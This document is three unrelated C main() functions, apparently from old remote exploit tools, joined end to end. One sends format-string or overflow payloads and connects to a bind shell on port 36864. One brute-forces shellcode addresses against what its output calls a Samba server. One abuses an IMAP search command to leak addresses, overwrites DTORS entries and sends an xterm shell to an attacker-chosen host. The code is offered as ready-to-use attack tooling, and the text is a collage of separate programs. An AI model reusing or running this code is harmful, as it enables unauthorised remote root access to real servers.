int main(int argc,char *argv[]) { int sock,type=0; int port=(PORT); char host[256]=DEF_HOST; int sflag=platform[type].sflag; unsigned long retloc=platform[type].dtors_addr; unsigned long shell=platform[type].shell; (void)banrl(); while((sock=getopt(argc,argv,"DdF:f:R:r:S:s:H:h:T:t:Ii"))!=EOF) { extern char *optarg; switch(sock) { case 'D': case 'd': __debug_chk=1; break; case 'R': case 'r': retloc=strtoul(optarg,NULL,0); break; case 'S': case 's': shell=strtoul(optarg,NULL,0); break; case 'F': case 'f': sflag=atoi(optarg); break; case 'H': case 'h': memset((char *)host,0,sizeof(host)); strncpy(host,optarg,sizeof(host)-1); break; case 'T': case 't': type=atoi(optarg); if(type>=4){ (void)usage(argv[0]); } else { retloc=platform[type].dtors_addr; shell=platform[type].shell; sflag=platform[type].sflag; } break; case 'I': case 'i': (void)usage(argv[0]); break; case '?': fprintf(stderr,"Try `%s -i' for more information.\n\n",argv[0]); exit(-1); break; } } fprintf(stdout," #\n # target host: %s:%d\n",host,port); fprintf(stdout," # type: %s\n",platform[type].os_type); switch(type) { case 0: case 1: (int)make_fmt_code(retloc,shell,sflag); break; case 2: (int)make_bof_code(shell,sflag,0); break; case 3: (int)make_bof_code(shell,sflag,1); } fprintf(stdout," # send code size: %d byte\n",strlen(t_atk)); sock=setsock(host,port); (void)re_connt(sock); if(__debug_chk) sleep(10); send(sock,t_atk,strlen(t_atk),0); close(sock); fprintf(stdout," #\n # Waiting rootshell, Trying %s:36864 ...\n",host); sleep(1); sock=setsock(host,36864); (void)re_connt(sock); fprintf(stdout," # connected to %s:36864 !\n #\n\n",host); (void)conn_shell(sock); }
int main(int argc,char *argv[]) { int sock,whtl,type=0,brute_f=0; char tg_host[0x82]="localhost"; u_long shell=plat[type].shell; (void)banrl(); if(argc<2) { (void)usage(argv[0]); } while((whtl=getopt(argc,argv,"H:h:S:s:T:t:IiB:b"))!=-1) { extern char *optarg; switch(whtl) { case 'H': case 'h': memset((char *)tg_host,0,sizeof(tg_host)); strncpy(tg_host,optarg,sizeof(tg_host)-1); break; case 'S': case 's': shell=strtoul(optarg,0,0); break; case 'T': case 't': if((type=atoi(optarg))>1) { (void)usage(argv[0]); } else shell=plat[type].shell; break; case 'I': case 'i': (void)usage(argv[0]); break; case 'B': case 'b': brute_f++; break; case '?': fprintf(stderr," Try `%s -i' for more information.\n\n",argv[0]); exit(-1); break; } } if(brute_f) { fprintf(stdout," **\n ** OK, It's good selection, Attack tries %d times.\n",BRUTE_AT); fprintf(stdout," ** If work process is boring, drink coffee and wait. hehe ;-D\n **\n\n"); fprintf(stdout," [*] Brute-Force mode:\n\n"); fprintf(stdout," |----+----+----+----+----+----+----+----+----+----+----+----+----|"); fprintf(stdout,"\n |"); for(brute_f=0;brute_f<BRUTE_AT;brute_f++) { fflush(stdout); fprintf(stdout,"="); shell+=(0x100); sock=(int)setsock(tg_host,ATK_PORT); if((int)re_connt(sock,0)==-1) { while(!(brute_f>=BRUTE_AT-1)) { fprintf(stdout,"="); brute_f++; } fprintf(stdout,"|\n\n"); fprintf(stderr," [-] Connect Failed.\n\n"); exit(-1); } __atk_code_send_recv(sock,shell); close(sock); sleep(2); sock=(int)setsock(tg_host,SH_PORT); if((int)re_connt(sock,0)==-1) { continue; } while(!(brute_f>=BRUTE_AT-1)) { fprintf(stdout,"="); brute_f++; } fprintf(stdout,"|\n\n"); fprintf(stdout," [+] Shellcode address: %p\n",shell); fprintf(stdout," [*] Brute-Force end !!\n\n"); fprintf(stdout," **\n ** Bind shellcode is port 10000.\n"); fprintf(stdout," ** If bindshell port number was changed, change connection port.\n **\n\n"); (void)send_recv_sh(sock); } fprintf(stdout,"|\n\n **\n"); fprintf(stdout," ** Brute-Force exploit failed. Reason is simple.\n **\n"); fprintf(stdout," ** Could not search shellcode's position during %d times.\n",BRUTE_AT); fprintf(stdout," ** Or, Operating System's target that we attack isn't.\n"); fprintf(stdout," ** OOops ! is server Samba version doubtful ??\n **\n\n"); exit(-1); } else { fprintf(stdout," [0] Target: %s\n",plat[type].ost); fprintf(stdout," [1] Set socket.\n"); sock=(int)setsock(tg_host,ATK_PORT); (int)re_connt(sock,1); fprintf(stdout," [2] Make shellcode & Send Packet.\n"); __atk_code_send_recv(sock,shell); close(sock); fprintf(stdout," [3] Trying %s:%d.\n",tg_host,SH_PORT); sleep(2); sock=(int)setsock(tg_host,SH_PORT); (int)re_connt(sock,1); fprintf(stdout," [*] Connected to %s:%d.\n",tg_host,SH_PORT); (void)send_recv_sh(sock); } }
int main(int argc,char *argv[]){ int sflag=DF_SFLAG; unsigned long do_system_addr=DO_SYSTEM; unsigned long retloc=DTOR_END_ADDR; unsigned long shaddr=SHELL; char host[256]=DEF_STR; int port=PORT; extern char *optarg; int sock,i,r=0; char buf[1024]; char user[256]=DEF_STR; char pass[256]=DEF_STR; char *ptr=NULL; char xhost_ip_buf[256]=XHOST_IP; get_10_ip(xhost_ip_buf); memset((char *)buf,0,sizeof(buf)); memset((char *)user,0,sizeof(user)); memset((char *)pass,0,sizeof(pass)); (void)banrl(); while((sock=getopt(argc,argv,"R:r:D:d:H:h:P:p:F:f:I:i:U:u:S:s:"))!=EOF){ switch(sock){ case 'R': case 'r': retloc=strtoul(optarg,NULL,0); break; case 'D': case 'd': do_system_addr=strtoul(optarg,NULL,0); break; case 'H': case 'h': memset((char *)host,0,sizeof(host)); strncpy(host,optarg,sizeof(host)-1); break; case 'P': case 'p': port=atoi(optarg); break; case 'F': case 'f': sflag=atoi(optarg); break; case 'I': case 'i': memset((char *)xhost_ip_buf,0,sizeof(xhost_ip_buf)); strncpy(xhost_ip_buf,optarg,sizeof(xhost_ip_buf)-1); get_10_ip(xhost_ip_buf); break; case 'U': case 'u': memset((char *)user,0,sizeof(user)); strncpy(user,optarg,sizeof(user)-1); break; case 'S': case 's': memset((char *)pass,0,sizeof(pass)); strncpy(pass,optarg,sizeof(pass)-1); break; case '?': default: (void)usage(argv[0]); break; } } if(!strcmp(host,DEF_STR)||!strcmp(user,DEF_STR)||!strcmp(pass,DEF_STR)){ (void)usage(argv[0]); } fprintf(stdout," [+] make socket.\n"); fprintf(stdout," [+] host: %s.\n",host); fprintf(stdout," [+] port: %d.\n",port); sock=setsock(host,port); re_connt(sock); recv(sock,buf,sizeof(buf)-1,0); if(strstr(buf,"IMAP4rev1")){ fprintf(stdout," [+] OK, IMAP4rev1.\n"); } else { fprintf(stdout," [-] Ooops, no match.\n\n"); close(sock); exit(-1); } memset((char *)buf,0,sizeof(buf)); snprintf(buf,sizeof(buf)-1,"1 login \"%s\" \"%s\"\n",user,pass); send(sock,buf,strlen(buf),0); memset((char *)buf,0,sizeof(buf)); while(recv(sock,buf,sizeof(buf)-1,0)){ if(strstr(buf," Completed")){ fprintf(stdout," [+] login completed.\n"); break; } else if(strstr(buf," rejected")){ fprintf(stdout," [-] login failed.\n\n"); exit(-1); } } memset((char *)buf,0,sizeof(buf)); snprintf(buf,sizeof(buf)-1,"1 select \"inbox\"\n"); send(sock,buf,strlen(buf),0); memset((char *)buf,0,sizeof(buf)); while(recv(sock,buf,sizeof(buf)-1,0)){ if(strstr(buf," Completed")){ fprintf(stdout," [+] select success.\n"); break; } else if(strstr(buf," NO SELECT")){ fprintf(stdout," [-] select failed.\n\n"); exit(-1); } } /* get, do_system address */ fprintf(stdout," [+] find do_system address.\n"); memset((char *)buf,0,sizeof(buf)); snprintf(buf,sizeof(buf)-1,"1 search topic |%%%d$x|\n",GET_DO_SYSTEM_SFLAG); send(sock,buf,strlen(buf),0); memset((char *)buf,0,sizeof(buf)); recv(sock,buf,sizeof(buf)-1,0); if(strstr(buf,"|")){ ptr=(char *)strstr(buf,"|"); sscanf(ptr,"|%x|\n",&do_system_addr); } do_system_addr-=DEF_DO_SYSTEM_OFFSET; fprintf(stdout," [+] make exploit code.\n"); fprintf(stdout," [+] retloc address: %p.\n",retloc); fprintf(stdout," [+] do_system address: %p.\n",do_system_addr); fprintf(stdout," [+] send exploit code.\n"); send_exploit_code(sock,retloc,do_system_addr,sflag); for(i=0,r=4;i<(sizeof(xterm_shell)/4);i++,r+=2){ send_exploit_code(sock,retloc+r,xterm_shell[i],sflag); } #define LOGOUT_CMD "1 logout\n" send(sock,LOGOUT_CMD,strlen(LOGOUT_CMD),0); sleep(1); recv(sock,buf,sizeof(buf)-1,0); close(sock); if(strstr(buf,"BYE")&&strstr(buf,"LOGOUT")){ fprintf(stdout," [+] logout success.\n\n"); } else { fprintf(stdout," [-] logout failed.\n\n"); exit(-1); } exit(0); }